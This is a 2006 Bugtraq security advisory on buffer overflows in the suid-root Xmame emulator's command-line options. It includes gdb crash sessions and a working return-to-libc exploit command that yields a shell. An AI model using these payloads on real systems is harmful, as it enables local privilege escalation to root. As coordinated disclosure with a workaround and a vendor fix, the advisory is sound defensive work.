[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060110204357.24692.qmail@securityfocus.com>
Date: 10 Jan 2006 20:43:57 -0000
From: xwings@...urityfocus.com, at@...urityfocus.com,
mysec@...urityfocus.com, dot@...urityfocus.com, org@...urityfocus.com
To: bugtraq@...urityfocus.com
Subject: mysec.org Security Advisory : Xmame buffer overflow, with a
possibility of privilege escalation
mysec.org Security Advisory : Xmame buffer overflow, with a
possibility of privilege escalation
Xmame buffer overflow, with a possibility of privilege escalation
mysec.org Security Advisory 11 Jan 2006
http://www.mysec.org
I. BACKGROUND
Xmame and xmess are ports of MAME, the Multiple Arcade Machine Emulator
and MESS, the Multi Emulator Super System. They run primarily on Linux
and various flavors of UNIX, although some other operating systems,
such as BeOS, are supported to some degree.
II. DESCRIPTION
Several functions in src/fileio.c and src/unix/fileio.c did not handle
large input propely. These can cause buffer overflow.
Most of the distros install xmame with suid root. There is a possibility
for a local user to gain root privilege.
Exploitation requires an attacker to send a specially
constructed input for these few arguments.
-lang
-ctrlr
-pb
-rec
For Ubuntu default installation, which is version 0.86 there is a
option which infaceted.
-jdev
III. POC
POC for -pb and -rec options ,
other options will be base on these info.
*********
* -pb
*********
(gdb) r -pb `ruby -e 'print "A" * 1034'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/games/xmame.x11 -pb
`ruby -e 'print "A" * 1034'`
(no debugging symbols found)
** More **
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1211603264 (LWP 8770)]
DGA requires root rights
Use of DGA-modes is disabled
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
info: trying to parse: /etc/xmame/xmamerc
error: /etc/xmame/xmamerc(71): unknown option joyusb-calibrate,
ignoring line
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /etc/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1211603264 (LWP 8770)]
0x41414141 in ?? ()
**********
* -rec
**********
(gdb) r -rec `ruby -e 'print "A" * 1020'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/xwings/coding/sploit/xmame/xmame-0.102/xmame.x11
-rec `ruby -e 'print "A" * 1020'`
(no debugging symbols found)
** More **
(no debugging symbols found)
info: trying to parse: /usr/local/share/xmame/xmamerc
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /usr/local/share/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc
info: trying to parse: /usr/local/share/xmame/rc/robbyrc
info: trying to parse: /home/xwings/.xmame/rc/robbyrc
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
*********************
* Successful Exploit
*********************
Platform : Ubuntu
Xmame Version : 0.102 - Selfcompile
Exploit Method : Return to Libc
xwings@...illac.<xmame-0.102>$ ./xmame.x0 -pb `ruby -e 'print "\x90" *
1016;print "\xd0\xf6\xd8\xb7";print "DUMP";print "\xaa\xf8\xff\xbf"'`
info: trying to parse: /usr/local/share/xmame/xmamerc
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /usr/local/share/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc
sh-3.1$
IV. DETECTION
mysec.org has confirmed this vulnerability on xmame 0.102. All previous
versions are suspected vulnerable to this issue.
V. WORKAROUND
Disable SUID root for all the installed xmame.
Do not run xmame.x11, xmame.sdl is recommended.
VI. VENDOR RESPONSE
Upgrade to CVS version.
http://x.mame.net/download.html
VIII. DISCLOSURE TIMELINE
1st Jan 2006, Initial vendor notification
2nd January 2006, Initial vendor response
11th January 2006, Vendor reply, bug fixed.
11th January 2006, Coordinated public disclosure
IX. CREDIT
Bug Founder : KaiJern, Lau
Email : xwings <at> mysec <dot> org
Thanks to all the folks pulltheplug.org.
Powered by blists - more mailing lists